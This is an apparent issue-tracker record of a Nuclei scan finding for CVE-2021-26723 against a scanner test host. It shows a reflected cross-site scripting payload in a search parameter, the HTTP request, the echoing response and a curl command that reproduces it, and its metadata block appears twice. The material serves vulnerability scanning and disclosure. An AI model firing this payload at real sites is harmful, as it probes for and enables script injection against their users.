Closed mkrs2404 closed 2 months ago
Details: CVE-2021-26723 matched at honey.scanme.sh
Protocol: HTTP
Full URL: https://honey.scanme.sh/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
Timestamp: Tue Apr 30 13:42:07 +0000 UTC 2024
Source: https://cloud.projectdiscovery.io/vuln/0427ca0bfad77aee9c6701cc83dc0b26
Template Information
Request
GET /ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: honey.scanme.sh User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Connection: close Accept: */* Accept-Language: en Accept-Encoding: gzip
Response
HTTP/1.1 200 OK Connection: close Content-Length: 308 Content-Type: text/html Date: Tue, 30 Apr 2024 13:42:06 GMT GET /ics?tool=search&query="><script>alert(document.domain)</script> HTTP/1.1 Host: honey.scanme.sh Accept: */* Accept-Encoding: gzip Accept-Language: en Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
References:
CURL command
curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36' 'https://honey.scanme.sh/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
Generated by Nuclei v3.2.5
Details: CVE-2021-26723 matched at honey.scanme.sh
Protocol: HTTP
Full URL: https://honey.scanme.sh/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
Timestamp: Tue Apr 30 13:42:07 +0000 UTC 2024
Source: https://cloud.projectdiscovery.io/vuln/0427ca0bfad77aee9c6701cc83dc0b26
Template Information
Request
Response
References:
CURL command
Generated by Nuclei v3.2.5